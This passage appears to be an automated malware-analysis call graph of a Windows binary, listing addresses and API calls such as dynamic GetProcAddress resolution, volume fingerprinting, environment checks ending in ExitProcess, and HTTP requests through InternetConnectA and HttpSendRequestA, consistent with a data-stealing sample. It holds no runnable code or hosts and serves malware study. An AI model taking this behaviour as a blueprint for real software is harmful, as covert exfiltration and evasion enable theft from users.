53326c 13974->13975 13976 5345c0 2 API calls 13975->13976 13977 533285 13976->13977 13978 5345c0 2 API calls 13977->13978 13979 53329e 13978->13979 13980 5345c0 2 API calls 13979->13980 13981 5332b7 13980->13981 13982 5345c0 2 API calls 13981->13982 13983 5332d0 13982->13983 13984 5345c0 2 API calls 13983->13984 13985 5332e9 13984->13985 13986 5345c0 2 API calls 13985->13986 13987 533302 13986->13987 13988 5345c0 2 API calls 13987->13988 13989 53331b 13988->13989 13990 5345c0 2 API calls 13989->13990 13991 533334 13990->13991 13992 5345c0 2 API calls 13991->13992 13993 53334d 13992->13993 13994 5345c0 2 API calls 13993->13994 13995 533366 13994->13995 13996 5345c0 2 API calls 13995->13996 13997 53337f 13996->13997 13998 5345c0 2 API calls 13997->13998 13999 533398 13998->13999 14000 5345c0 2 API calls 13999->14000 14001 5333b1 14000->14001 14002 5345c0 2 API calls 14001->14002 14003 5333ca 14002->14003 14004 5345c0 2 API calls 14003->14004 14005 5333e3 14004->14005 14006 5345c0 2 API calls 14005->14006 14007 5333fc 14006->14007 14008 5345c0 2 API calls 14007->14008 14009 533415 14008->14009 14010 5345c0 2 API calls 14009->14010 14011 53342e 14010->14011 14012 5345c0 2 API calls 14011->14012 14013 533447 14012->14013 14014 5345c0 2 API calls 14013->14014 14015 533460 14014->14015 14016 5345c0 2 API calls 14015->14016 14017 533479 14016->14017 14018 5345c0 2 API calls 14017->14018 14019 533492 14018->14019 14020 5345c0 2 API calls 14019->14020 14021 5334ab 14020->14021 14022 5345c0 2 API calls 14021->14022 14023 5334c4 14022->14023 14024 5345c0 2 API calls 14023->14024 14025 5334dd 14024->14025 14026 5345c0 2 API calls 14025->14026 14027 5334f6 14026->14027 14028 5345c0 2 API calls 14027->14028 14029 53350f 14028->14029 14030 5345c0 2 API calls 14029->14030 14031 533528 14030->14031 14032 5345c0 2 API calls 14031->14032 14033 533541 14032->14033 14034 5345c0 2 API calls 14033->14034 14035 53355a 14034->14035 14036 5345c0 2 API calls 14035->14036 14037 533573 14036->14037 14038 5345c0 2 API calls 14037->14038 14039 53358c 14038->14039 14040 5345c0 2 API calls 14039->14040 14041 5335a5 14040->14041 14042 5345c0 2 API calls 14041->14042 14043 5335be 14042->14043 14044 5345c0 2 API calls 14043->14044 14045 5335d7 14044->14045 14046 5345c0 2 API calls 14045->14046 14047 5335f0 14046->14047 14048 5345c0 2 API calls 14047->14048 14049 533609 14048->14049 14050 5345c0 2 API calls 14049->14050 14051 533622 14050->14051 14052 5345c0 2 API calls 14051->14052 14053 53363b 14052->14053 14054 5345c0 2 API calls 14053->14054 14055 533654 14054->14055 14056 5345c0 2 API calls 14055->14056 14057 53366d 14056->14057 14058 5345c0 2 API calls 14057->14058 14059 533686 14058->14059 14060 5345c0 2 API calls 14059->14060 14061 53369f 14060->14061 14062 5345c0 2 API calls 14061->14062 14063 5336b8 14062->14063 14064 5345c0 2 API calls 14063->14064 14065 5336d1 14064->14065 14066 5345c0 2 API calls 14065->14066 14067 5336ea 14066->14067 14068 5345c0 2 API calls 14067->14068 14069 533703 14068->14069 14070 5345c0 2 API calls 14069->14070 14071 53371c 14070->14071 14072 5345c0 2 API calls 14071->14072 14073 533735 14072->14073 14074 5345c0 2 API calls 14073->14074 14075 53374e 14074->14075 14076 5345c0 2 API calls 14075->14076 14077 533767 14076->14077 14078 5345c0 2 API calls 14077->14078 14079 533780 14078->14079 14080 5345c0 2 API calls 14079->14080 14081 533799 14080->14081 14082 5345c0 2 API calls 14081->14082 14083 5337b2 14082->14083 14084 5345c0 2 API calls 14083->14084 14085 5337cb 14084->14085 14086 5345c0 2 API calls 14085->14086 14087 5337e4 14086->14087 14088 5345c0 2 API calls 14087->14088 14089 5337fd 14088->14089 14090 5345c0 2 API calls 14089->14090 14091 533816 14090->14091 14092 5345c0 2 API calls 14091->14092 14093 53382f 14092->14093 14094 5345c0 2 API calls 14093->14094 14095 533848 14094->14095 14096 5345c0 2 API calls 14095->14096 14097 533861 14096->14097 14098 5345c0 2 API calls 14097->14098 14099 53387a 14098->14099 14100 5345c0 2 API calls 14099->14100 14101 533893 14100->14101 14102 5345c0 2 API calls 14101->14102 14103 5338ac 14102->14103 14104 5345c0 2 API calls 14103->14104 14105 5338c5 14104->14105 14106 5345c0 2 API calls 14105->14106 14107 5338de 14106->14107 14108 5345c0 2 API calls 14107->14108 14109 5338f7 14108->14109 14110 5345c0 2 API calls 14109->14110 14111 533910 14110->14111 14112 5345c0 2 API calls 14111->14112 14113 533929 14112->14113 14114 5345c0 2 API calls 14113->14114 14115 533942 14114->14115 14116 5345c0 2 API calls 14115->14116 14117 53395b 14116->14117 14118 5345c0 2 API calls 14117->14118 14119 533974 14118->14119 14120 5345c0 2 API calls 14119->14120 14121 53398d 14120->14121 14122 5345c0 2 API calls 14121->14122 14123 5339a6 14122->14123 14124 5345c0 2 API calls 14123->14124 14125 5339bf 14124->14125 14126 5345c0 2 API calls 14125->14126 14127 5339d8 14126->14127 14128 5345c0 2 API calls 14127->14128 14129 5339f1 14128->14129 14130 5345c0 2 API calls 14129->14130 14131 533a0a 14130->14131 14132 5345c0 2 API calls 14131->14132 14133 533a23 14132->14133 14134 5345c0 2 API calls 14133->14134 14135 533a3c 14134->14135 14136 5345c0 2 API calls 14135->14136 14137 533a55 14136->14137 14138 5345c0 2 API calls 14137->14138 14139 533a6e 14138->14139 14140 5345c0 2 API calls 14139->14140 14141 533a87 14140->14141 14142 5345c0 2 API calls 14141->14142 14143 533aa0 14142->14143 14144 5345c0 2 API calls 14143->14144 14145 533ab9 14144->14145 14146 5345c0 2 API calls 14145->14146 14147 533ad2 14146->14147 14148 5345c0 2 API calls 14147->14148 14149 533aeb 14148->14149 14150 5345c0 2 API calls 14149->14150 14151 533b04 14150->14151 14152 5345c0 2 API calls 14151->14152 14153 533b1d 14152->14153 14154 5345c0 2 API calls 14153->14154 14155 533b36 14154->14155 14156 5345c0 2 API calls 14155->14156 14157 533b4f 14156->14157 14158 5345c0 2 API calls 14157->14158 14159 533b68 14158->14159 14160 5345c0 2 API calls 14159->14160 14161 533b81 14160->14161 14162 5345c0 2 API calls 14161->14162 14163 533b9a 14162->14163 14164 5345c0 2 API calls 14163->14164 14165 533bb3 14164->14165 14166 5345c0 2 API calls 14165->14166 14167 533bcc 14166->14167 14168 5345c0 2 API calls 14167->14168 14169 533be5 14168->14169 14170 5345c0 2 API calls 14169->14170 14171 533bfe 14170->14171 14172 5345c0 2 API calls 14171->14172 14173 533c17 14172->14173 14174 5345c0 2 API calls 14173->14174 14175 533c30 14174->14175 14176 5345c0 2 API calls 14175->14176 14177 533c49 14176->14177 14178 5345c0 2 API calls 14177->14178 14179 533c62 14178->14179 14180 5345c0 2 API calls 14179->14180 14181 533c7b 14180->14181 14182 5345c0 2 API calls 14181->14182 14183 533c94 14182->14183 14184 5345c0 2 API calls 14183->14184 14185 533cad 14184->14185 14186 5345c0 2 API calls 14185->14186 14187 533cc6 14186->14187 14188 5345c0 2 API calls 14187->14188 14189 533cdf 14188->14189 14190 5345c0 2 API calls 14189->14190 14191 533cf8 14190->14191 14192 5345c0 2 API calls 14191->14192 14193 533d11 14192->14193 14194 5345c0 2 API calls 14193->14194 14195 533d2a 14194->14195 14196 5345c0 2 API calls 14195->14196 14197 533d43 14196->14197 14198 5345c0 2 API calls 14197->14198 14199 533d5c 14198->14199 14200 5345c0 2 API calls 14199->14200 14201 533d75 14200->14201 14202 5345c0 2 API calls 14201->14202 14203 533d8e 14202->14203 14204 5345c0 2 API calls 14203->14204 14205 533da7 14204->14205 14206 5345c0 2 API calls 14205->14206 14207 533dc0 14206->14207 14208 5345c0 2 API calls 14207->14208 14209 533dd9 14208->14209 14210 5345c0 2 API calls 14209->14210 14211 533df2 14210->14211 14212 5345c0 2 API calls 14211->14212 14213 533e0b 14212->14213 14214 5345c0 2 API calls 14213->14214 14215 533e24 14214->14215 14216 5345c0 2 API calls 14215->14216 14217 533e3d 14216->14217 14218 5345c0 2 API calls 14217->14218 14219 533e56 14218->14219 14220 5345c0 2 API calls 14219->14220 14221 533e6f 14220->14221 14222 5345c0 2 API calls 14221->14222 14223 533e88 14222->14223 14224 5345c0 2 API calls 14223->14224 14225 533ea1 14224->14225 14226 5345c0 2 API calls 14225->14226 14227 533eba 14226->14227 14228 5345c0 2 API calls 14227->14228 14229 533ed3 14228->14229 14230 5345c0 2 API calls 14229->14230 14231 533eec 14230->14231 14232 5345c0 2 API calls 14231->14232 14233 533f05 14232->14233 14234 5345c0 2 API calls 14233->14234 14235 533f1e 14234->14235 14236 5345c0 2 API calls 14235->14236 14237 533f37 14236->14237 14238 5345c0 2 API calls 14237->14238 14239 533f50 14238->14239 14240 5345c0 2 API calls 14239->14240 14241 533f69 14240->14241 14242 5345c0 2 API calls 14241->14242 14243 533f82 14242->14243 14244 5345c0 2 API calls 14243->14244 14245 533f9b 14244->14245 14246 5345c0 2 API calls 14245->14246 14247 533fb4 14246->14247 14248 5345c0 2 API calls 14247->14248 14249 533fcd 14248->14249 14250 5345c0 2 API calls 14249->14250 14251 533fe6 14250->14251 14252 5345c0 2 API calls 14251->14252 14253 533fff 14252->14253 14254 5345c0 2 API calls 14253->14254 14255 534018 14254->14255 14256 5345c0 2 API calls 14255->14256 14257 534031 14256->14257 14258 5345c0 2 API calls 14257->14258 14259 53404a 14258->14259 14260 5345c0 2 API calls 14259->14260 14261 534063 14260->14261 14262 5345c0 2 API calls 14261->14262 14263 53407c 14262->14263 14264 5345c0 2 API calls 14263->14264 14265 534095 14264->14265 14266 5345c0 2 API calls 14265->14266 14267 5340ae 14266->14267 14268 5345c0 2 API calls 14267->14268 14269 5340c7 14268->14269 14270 5345c0 2 API calls 14269->14270 14271 5340e0 14270->14271 14272 5345c0 2 API calls 14271->14272 14273 5340f9 14272->14273 14274 5345c0 2 API calls 14273->14274 14275 534112 14274->14275 14276 5345c0 2 API calls 14275->14276 14277 53412b 14276->14277 14278 5345c0 2 API calls 14277->14278 14279 534144 14278->14279 14280 5345c0 2 API calls 14279->14280 14281 53415d 14280->14281 14282 5345c0 2 API calls 14281->14282 14283 534176 14282->14283 14284 5345c0 2 API calls 14283->14284 14285 53418f 14284->14285 14286 5345c0 2 API calls 14285->14286 14287 5341a8 14286->14287 14288 5345c0 2 API calls 14287->14288 14289 5341c1 14288->14289 14290 5345c0 2 API calls 14289->14290 14291 5341da 14290->14291 14292 5345c0 2 API calls 14291->14292 14293 5341f3 14292->14293 14294 5345c0 2 API calls 14293->14294 14295 53420c 14294->14295 14296 5345c0 2 API calls 14295->14296 14297 534225 14296->14297 14298 5345c0 2 API calls 14297->14298 14299 53423e 14298->14299 14300 5345c0 2 API calls 14299->14300 14301 534257 14300->14301 14302 5345c0 2 API calls 14301->14302 14303 534270 14302->14303 14304 5345c0 2 API calls 14303->14304 14305 534289 14304->14305 14306 5345c0 2 API calls 14305->14306 14307 5342a2 14306->14307 14308 5345c0 2 API calls 14307->14308 14309 5342bb 14308->14309 14310 5345c0 2 API calls 14309->14310 14311 5342d4 14310->14311 14312 5345c0 2 API calls 14311->14312 14313 5342ed 14312->14313 14314 5345c0 2 API calls 14313->14314 14315 534306 14314->14315 14316 5345c0 2 API calls 14315->14316 14317 53431f 14316->14317 14318 5345c0 2 API calls 14317->14318 14319 534338 14318->14319 14320 5345c0 2 API calls 14319->14320 14321 534351 14320->14321 14322 5345c0 2 API calls 14321->14322 14323 53436a 14322->14323 14324 5345c0 2 API calls 14323->14324 14325 534383 14324->14325 14326 5345c0 2 API calls 14325->14326 14327 53439c 14326->14327 14328 5345c0 2 API calls 14327->14328 14329 5343b5 14328->14329 14330 5345c0 2 API calls 14329->14330 14331 5343ce 14330->14331 14332 5345c0 2 API calls 14331->14332 14333 5343e7 14332->14333 14334 5345c0 2 API calls 14333->14334 14335 534400 14334->14335 14336 5345c0 2 API calls 14335->14336 14337 534419 14336->14337 14338 5345c0 2 API calls 14337->14338 14339 534432 14338->14339 14340 5345c0 2 API calls 14339->14340 14341 53444b 14340->14341 14342 5345c0 2 API calls 14341->14342 14343 534464 14342->14343 14344 5345c0 2 API calls 14343->14344 14345 53447d 14344->14345 14346 5345c0 2 API calls 14345->14346 14347 534496 14346->14347 14348 5345c0 2 API calls 14347->14348 14349 5344af 14348->14349 14350 5345c0 2 API calls 14349->14350 14351 5344c8 14350->14351 14352 5345c0 2 API calls 14351->14352 14353 5344e1 14352->14353 14354 5345c0 2 API calls 14353->14354 14355 5344fa 14354->14355 14356 5345c0 2 API calls 14355->14356 14357 534513 14356->14357 14358 5345c0 2 API calls 14357->14358 14359 53452c 14358->14359 14360 5345c0 2 API calls 14359->14360 14361 534545 14360->14361 14362 5345c0 2 API calls 14361->14362 14363 53455e 14362->14363 14364 5345c0 2 API calls 14363->14364 14365 534577 14364->14365 14366 5345c0 2 API calls 14365->14366 14367 534590 14366->14367 14368 5345c0 2 API calls 14367->14368 14369 5345a9 14368->14369 14370 549c10 14369->14370 14371 54a036 8 API calls 14370->14371 14372 549c20 43 API calls 14370->14372 14373 54a146 14371->14373 14374 54a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14371->14374 14372->14371 14375 54a216 14373->14375 14376 54a153 8 API calls 14373->14376 14374->14373 14377 54a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14375->14377 14378 54a298 14375->14378 14376->14375 14377->14378 14379 54a2a5 6 API calls 14378->14379 14380 54a337 14378->14380 14379->14380 14381 54a344 9 API calls 14380->14381 14382 54a41f 14380->14382 14381->14382 14383 54a4a2 14382->14383 14384 54a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14382->14384 14385 54a4dc 14383->14385 14386 54a4ab GetProcAddress GetProcAddress 14383->14386 14384->14383 14387 54a515 14385->14387 14388 54a4e5 GetProcAddress GetProcAddress 14385->14388 14386->14385 14389 54a612 14387->14389 14390 54a522 10 API calls 14387->14390 14388->14387 14391 54a67d 14389->14391 14392 54a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14389->14392 14390->14389 14393 54a686 GetProcAddress 14391->14393 14394 54a69e 14391->14394 14392->14391 14393->14394 14395 54a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14394->14395 14396 545ca3 14394->14396 14395->14396 14397 531590 14396->14397 15516 531670 14397->15516 14400 54a7a0 lstrcpy 14401 5315b5 14400->14401 14402 54a7a0 lstrcpy 14401->14402 14403 5315c7 14402->14403 14404 54a7a0 lstrcpy 14403->14404 14405 5315d9 14404->14405 14406 54a7a0 lstrcpy 14405->14406 14407 531663 14406->14407 14408 545510 14407->14408 14409 545521 14408->14409 14410 54a820 2 API calls 14409->14410 14411 54552e 14410->14411 14412 54a820 2 API calls 14411->14412 14413 54553b 14412->14413 14414 54a820 2 API calls 14413->14414 14415 545548 14414->14415 14416 54a740 lstrcpy 14415->14416 14417 545555 14416->14417 14418 54a740 lstrcpy 14417->14418 14419 545562 14418->14419 14420 54a740 lstrcpy 14419->14420 14421 54556f 14420->14421 14422 54a740 lstrcpy 14421->14422 14461 54557c 14422->14461 14423 5452c0 25 API calls 14423->14461 14424 545643 StrCmpCA 14424->14461 14425 5456a0 StrCmpCA 14426 5457dc 14425->14426 14425->14461 14427 54a8a0 lstrcpy 14426->14427 14428 5457e8 14427->14428 14429 54a820 2 API calls 14428->14429 14431 5457f6 14429->14431 14430 54a820 lstrlen lstrcpy 14430->14461 14433 54a820 2 API calls 14431->14433 14432 545856 StrCmpCA 14434 545991 14432->14434 14432->14461 14435 545805 14433->14435 14436 54a8a0 lstrcpy 14434->14436 14438 531670 lstrcpy 14435->14438 14437 54599d 14436->14437 14439 54a820 2 API calls 14437->14439 14458 545811 14438->14458 14440 5459ab 14439->14440 14442 54a820 2 API calls 14440->14442 14441 545a0b StrCmpCA 14443 545a16 Sleep 14441->14443 14444 545a28 14441->14444 14446 5459ba 14442->14446 14443->14461 14447 54a8a0 lstrcpy 14444->14447 14445 54a740 lstrcpy 14445->14461 14448 531670 lstrcpy 14446->14448 14449 545a34 14447->14449 14448->14458 14451 54a820 2 API calls 14449->14451 14450 531590 lstrcpy 14450->14461 14452 545a43 14451->14452 14454 54a820 2 API calls 14452->14454 14453 5451f0 20 API calls 14453->14461 14456 545a52 14454->14456 14455 54578a StrCmpCA 14455->14461 14457 531670 lstrcpy 14456->14457 14457->14458 14458->13515 14459 54593f StrCmpCA 14459->14461 14460 54a7a0 lstrcpy 14460->14461 14461->14423 14461->14424 14461->14425 14461->14430 14461->14432 14461->14441 14461->14445 14461->14450 14461->14453 14461->14455 14461->14459 14461->14460 14462 54a8a0 lstrcpy 14461->14462 14462->14461 14464 547553 GetVolumeInformationA 14463->14464 14465 54754c 14463->14465 14466 547591 14464->14466 14465->14464 14467 5475fc GetProcessHeap RtlAllocateHeap 14466->14467 14468 547628 wsprintfA 14467->14468 14469 547619 14467->14469 14471 54a740 lstrcpy 14468->14471 14470 54a740 lstrcpy 14469->14470 14472 545da7 14470->14472 14471->14472 14472->13536 14474 54a7a0 lstrcpy 14473->14474 14475 534899 14474->14475 15525 5347b0 14475->15525 14477 5348a5 14478 54a740 lstrcpy 14477->14478 14479 5348d7 14478->14479 14480 54a740 lstrcpy 14479->14480 14481 5348e4 14480->14481 14482 54a740 lstrcpy 14481->14482 14483 5348f1 14482->14483 14484 54a740 lstrcpy 14483->14484 14485 5348fe 14484->14485 14486 54a740 lstrcpy 14485->14486 14487 53490b InternetOpenA StrCmpCA 14486->14487 14488 534944 14487->14488 14489 534ecb InternetCloseHandle 14488->14489 15531 548b60 14488->15531 14491 534ee8 14489->14491 15546 539ac0 CryptStringToBinaryA 14491->15546 14492 534963 15539 54a920 14492->15539 14495 534976 14497 54a8a0 lstrcpy 14495->14497 14502 53497f 14497->14502 14498 54a820 2 API calls 14499 534f05 14498->14499 14501 54a9b0 4 API calls 14499->14501 14500 534f27 codecvt 14504 54a7a0 lstrcpy 14500->14504 14503 534f1b 14501->14503 14506 54a9b0 4 API calls 14502->14506 14505 54a8a0 lstrcpy 14503->14505 14517 534f57 14504->14517 14505->14500 14507 5349a9 14506->14507 14508 54a8a0 lstrcpy 14507->14508 14509 5349b2 14508->14509 14510 54a9b0 4 API calls 14509->14510 14511 5349d1 14510->14511 14512 54a8a0 lstrcpy 14511->14512 14513 5349da 14512->14513 14514 54a920 3 API calls 14513->14514 14515 5349f8 14514->14515 14516 54a8a0 lstrcpy 14515->14516 14518 534a01 14516->14518 14517->13539 14519 54a9b0 4 API calls 14518->14519 14520 534a20 14519->14520 14521 54a8a0 lstrcpy 14520->14521 14522 534a29 14521->14522 14523 54a9b0 4 API calls 14522->14523 14524 534a48 14523->14524 14525 54a8a0 lstrcpy 14524->14525 14526 534a51 14525->14526 14527 54a9b0 4 API calls 14526->14527 14528 534a7d 14527->14528 14529 54a920 3 API calls 14528->14529 14530 534a84 14529->14530 14531 54a8a0 lstrcpy 14530->14531 14532 534a8d 14531->14532 14533 534aa3 InternetConnectA 14532->14533 14533->14489 14534 534ad3 HttpOpenRequestA 14533->14534 14536 534b28 14534->14536 14537 534ebe InternetCloseHandle 14534->14537 14538 54a9b0 4 API calls 14536->14538 14537->14489 14539 534b3c 14538->14539 14540 54a8a0 lstrcpy 14539->14540 14541 534b45 14540->14541 14542 54a920 3 API calls 14541->14542 14543 534b63 14542->14543 14544 54a8a0 lstrcpy 14543->14544 14545 534b6c 14544->14545 14546 54a9b0 4 API calls 14545->14546 14547 534b8b 14546->14547 14548 54a8a0 lstrcpy 14547->14548 14549 534b94 14548->14549 14550 54a9b0 4 API calls 14549->14550 14551 534bb5 14550->14551 14552 54a8a0 lstrcpy 14551->14552 14553 534bbe 14552->14553 14554 54a9b0 4 API calls 14553->14554 14555 534bde 14554->14555 14556 54a8a0 lstrcpy 14555->14556 14557 534be7 14556->14557 14558 54a9b0 4 API calls 14557->14558 14559 534c06 14558->14559 14560 54a8a0 lstrcpy 14559->14560 14561 534c0f 14560->14561 14562 54a920 3 API calls 14561->14562 14563 534c2d 14562->14563 14564 54a8a0 lstrcpy 14563->14564 14565 534c36 14564->14565 14566 54a9b0 4 API calls 14565->14566 14567 534c55 14566->14567 14568 54a8a0 lstrcpy 14567->14568 14569 534c5e 14568->14569 14570 54a9b0 4 API calls 14569->14570 14571 534c7d 14570->14571 14572 54a8a0 lstrcpy 14571->14572 14573 534c86 14572->14573 14574 54a920 3 API calls 14573->14574 14575 534ca4 14574->14575 14576 54a8a0 lstrcpy 14575->14576 14577 534cad 14576->14577 14578 54a9b0 4 API calls 14577->14578 14579 534ccc 14578->14579 14580 54a8a0 lstrcpy 14579->14580 14581 534cd5 14580->14581 14582 54a9b0 4 API calls 14581->14582 14583 534cf6 14582->14583 14584 54a8a0 lstrcpy 14583->14584 14585 534cff 14584->14585 14586 54a9b0 4 API calls 14585->14586 14587 534d1f 14586->14587 14588 54a8a0 lstrcpy 14587->14588 14589 534d28 14588->14589 14590 54a9b0 4 API calls 14589->14590 14591 534d47 14590->14591 14592 54a8a0 lstrcpy 14591->14592 14593 534d50 14592->14593 14594 54a920 3 API calls 14593->14594 14595 534d6e 14594->14595 14596 54a8a0 lstrcpy 14595->14596 14597 534d77 14596->14597 14598 54a740 lstrcpy 14597->14598 14599 534d92 14598->14599 14600 54a920 3 API calls 14599->14600 14601 534db3 14600->14601 14602 54a920 3 API calls 14601->14602 14603 534dba 14602->14603 14604 54a8a0 lstrcpy 14603->14604 14605 534dc6 14604->14605 14606 534de7 lstrlen 14605->14606 14607 534dfa 14606->14607 14608 534e03 lstrlen 14607->14608 15545 54aad0 14608->15545 14610 534e13 HttpSendRequestA 14611 534e32 InternetReadFile 14610->14611 14612 534e67 InternetCloseHandle 14611->14612 14617 534e5e 14611->14617 14614 54a800 14612->14614 14614->14537 14615 54a9b0 4 API calls 14615->14617 14616 54a8a0 lstrcpy 14616->14617 14617->14611 14617->14612 14617->14615 14617->14616 15552 54aad0 14618->15552 14620 5417c4 StrCmpCA 14621 5417cf ExitProcess 14620->14621 14633 5417d7 14620->14633 14622 5419c2 14622->13541 14623 541970 StrCmpCA 14623->14633 14624 5418f1 StrCmpCA 14624->14633 14625 541951 StrCmpCA 14625->14633 14626 541932 StrCmpCA 14626->14633 14627 541913 StrCmpCA 14627->14633 14628 54185d StrCmpCA 14628->14633 14629 54187f StrCmpCA 14629->14633 14630 5418ad StrCmpCA 14630->14633 14631 5418cf StrCmpCA 14631->14633 14632 54a820 lstrlen lstrcpy 14632->14633 14633->14622 14633->14623 14633->14624 14633->14625 14633->14626 14633->14627 14633->14628 14633->14629 14633->14630 14633->14631 14633->14632 14635 54a7a0 lstrcpy 14634->14635 14636 535979 14635->14636 14637 5347b0 2 API calls 14636->14637 14638 535985 14637->14638 14639 54a740 lstrcpy 14638->14639 14640 5359ba 14639->14640 14641 54a740 lstrcpy 14640->14641 14642 5359c7 14641->14642 14643 54a740 lstrcpy 14642->14643 14644 5359d4 14643->14644 14645 54a740 lstrcpy 14644->14645 14646 5359e1 14645->14646 14647 54a740 lstrcpy 14646->14647 14648 5359ee InternetOpenA StrCmpCA 14647->14648 14649 535a1d 14648->14649 14650 535fc3 InternetCloseHandle 14649->14650 14651 548b60 3 API calls 14649->14651 14652 535fe0 14650->14652 14653 535a3c 14651->14653 14655 539ac0 4 API calls 14652->14655 14654 54a920 3 API calls 14653->14654 14656 535a4f 14654->14656 14657 535fe6 14655->14657 14658 54a8a0 lstrcpy 14656->14658 14659 54a820 2 API calls 14657->14659 14661 53601f codecvt 14657->14661 14663 535a58 14658->14663 14660 535ffd 14659->14660 14662 54a9b0 4 API calls 14660->14662 14665 54a7a0 lstrcpy 14661->14665 14664 536013 14662->14664 14667 54a9b0 4 API calls 14663->14667 14666 54a8a0 lstrcpy 14664->14666 14675 53604f 14665->14675 14666->14661 14668 535a82 14667->14668 14669 54a8a0 lstrcpy 14668->14669 14670 535a8b 14669->14670 14671 54a9b0 4 API calls 14670->14671 14672 535aaa 14671->14672 14673 54a8a0 lstrcpy 14672->14673 14674 535ab3 14673->14674 14676 54a920 3 API calls 14674->14676 14675->13547 14677 535ad1 14676->14677 14678 54a8a0 lstrcpy 14677->14678 14679 535ada 14678->14679 14680 54a9b0 4 API calls 14679->14680 14681 535af9 14680->14681 14682 54a8a0 lstrcpy 14681->14682 14683 535b02 14682->14683 14684 54a9b0 4 API calls 14683->14684 14685 535b21 14684->14685 14686 54a8a0 lstrcpy 14685->14686 14687 535b2a 14686->14687 14688 54a9b0 4 API calls 14687->14688 14689 535b56 14688->14689 14690 54a920 3 API calls 14689->14690 14691 535b5d 14690->14691 14692 54a8a0 lstrcpy 14691->14692 14693 535b66 14692->14693 14694 535b7c InternetConnectA 14693->14694 14694->14650 14695 535bac HttpOpenRequestA 14694->14695 14697 535fb6 InternetCloseHandle 14695->14697 14698 535c0b 14695->14698 14697->14650 14699 54a9b0 4 API calls 14698->14699 14700 535c1f 14699->14700 14701 54a8a0 lstrcpy 14700->14701 14702 535c28 14701->14702 14703 54a920 3 API calls 14702->14703 14704 535c46 14703->14704 14705 54a8a0 lstrcpy 14704->14705 14706 535c4f 14705->14706 14707 54a9b0 4 API calls 14706->14707 14708 535c6e 14707->14708 14709 54a8a0 lstrcpy 14708->14709 14710 535c77 14709->14710 14711 54a9b0 4 API calls 14710->14711 14712 535c98 14711->14712 14713 54a8a0 lstrcpy 14712->14713 14714 535ca1 14713->14714 14715 54a9b0 4 API calls 14714->14715 14716 535cc1 14715->14716 14717 54a8a0 lstrcpy 14716->14717 14718 535cca 14717->14718 14719 54a9b0 4 API calls 14718->14719 14720 535ce9 14719->14720 14721 54a8a0 lstrcpy 14720->14721 14722 535cf2 14721->14722 14723 54a920 3 API calls 14722->14723 14724 535d10 14723->14724 14725 54a8a0 lstrcpy 14724->14725 14726 535d19 14725->14726 14727 54a9b0 4 API calls 14726->14727 14728 535d38 14727->14728 14729 54a8a0 lstrcpy 14728->14729 14730 535d41 14729->14730 14731 54a9b0 4 API calls 14730->14731 14732 535d60 14731->14732 14733 54a8a0 lstrcpy 14732->14733 14734 535d69 14733->14734 14735 54a920 3 API calls 14734->14735 14736 535d87 14735->14736 14737 54a8a0 lstrcpy 14736->14737 14738 535d90 14737->14738 14739 54a9b0 4 API calls 14738->14739 14740 535daf 14739->14740 14741 54a8a0 lstrcpy 14740->14741 14742 535db8 14741->14742 14743 54a9b0 4 API calls 14742->14743 14744 535dd9 14743->14744 14745 54a8a0 lstrcpy 14744->14745 14746 535de2 14745->14746 14747 54a9b0 4 API calls 14746->14747 14748 535e02 14747->14748 14749 54a8a0 lstrcpy 14748->14749 14750 535e0b 14749->14750 14751 54a9b0 4 API calls 14750->14751 14752 535e2a 14751->14752 14753 54a8a0 lstrcpy 14752->14753 14754 535e33 14753->14754 14755 54a920 3 API calls 14754->14755 14756 535e54 14755->14756 14757 54a8a0 lstrcpy 14756->14757 14758 535e5d 14757->14758 14759 535e70 lstrlen 14758->14759 15553 54aad0 14759->15553 14761 535e81 lstrlen GetProcessHeap RtlAllocateHeap 15554 54aad0 14761->15554 14763 535eae lstrlen 14764 535ebe 14763->14764 14765 535ed7 lstrlen 14764->14765 14766 535ee7 14765->14766 14767 535ef0 lstrlen 14766->14767 14768 535f03 14767->14768 14769 535f1a lstrlen 14768->14769 15555 54aad0 14769->15555 14771 535f2a HttpSendRequestA 14772 535f35 InternetReadFile 14771->14772 14773 535f6a InternetCloseHandle 14772->14773 14777 535f61 14772->14777 14773->14697 14775 54a9b0 4 API calls 14775->14777 14776 54a8a0 lstrcpy 14776->14777 14777->14772 14777->14773 14777->14775 14777->14776 14780 541077 14778->14780 14779 541151 14779->13549 14780->14779 14781 54a820 lstrlen lstrcpy 14780->14781 14781->14780 14783 540db7 14782->14783 14784 540f17 14783->14784 14785 540ea4 StrCmpCA 14783->14785 14786 540e27 StrCmpCA 14783->14786 14787 540e67 StrCmpCA 14783->14787 14788 54a820 lstrlen lstrcpy 14783->14788 14784->13557 14785->14783 14786->14783 14787->14783 14788->14783 14790 540f67 14789->14790 14791 541044 14790->14791 14792 540fb2 StrCmpCA 14790->14792 14793 54a820 lstrlen lstrcpy 14790->14793 14791->13565 14792->14790 14793->14790 14795 54a740 lstrcpy 14794->14795 14796 541a26 14795->14796 14797 54a9b0 4 API calls 14796->14797 14798 541a37 14797->14798 14799 54a8a0 lstrcpy 14798->14799 14800 541a40 14799->14800 14801 54a9b0 4 API calls 14800->14801 14802 541a5b 14801->14802 14803 54a8a0 lstrcpy 14802->14803 14804 541a64 14803->14804 14805 54a9b0 4 API calls 14804->14805 14806 541a7d 14805->14806 14807 54a8a0 lstrcpy 14806->14807 14808 541a86 14807->14808 14809 54a9b0 4 API calls 14808->14809 14810 541aa1 14809->14810 14811 54a8a0 lstrcpy 14810->14811 14812 541aaa 14811->14812 14813 54a9b0 4 API calls 14812->14813 14814 541ac3 14813->14814 14815 54a8a0 lstrcpy 14814->14815 14816 541acc 14815->14816 14817 54a9b0 4 API calls 14816->14817 14818 541ae7 14817->14818 14819 54a8a0 lstrcpy 14818->14819 14820 541af0 14819->14820 14821 54a9b0 4 API calls 14820->14821 14822 541b09 14821->14822 14823 54a8a0 lstrcpy 14822->14823 14824 541b12 14823->14824 14825 54a9b0 4 API calls 14824->14825 14826 541b2d 14825->14826 14827 54a8a0 lstrcpy 14826->14827 14828 541b36 14827->14828 14829 54a9b0 4 API calls 14828->14829 14830 541b4f 14829->14830 14831 54a8a0 lstrcpy 14830->14831 14832 541b58 14831->14832 14833 54a9b0 4 API calls 14832->14833 14834 541b76 14833->14834 14835 54a8a0 lstrcpy 14834->14835 14836 541b7f 14835->14836 14837 547500 6 API calls 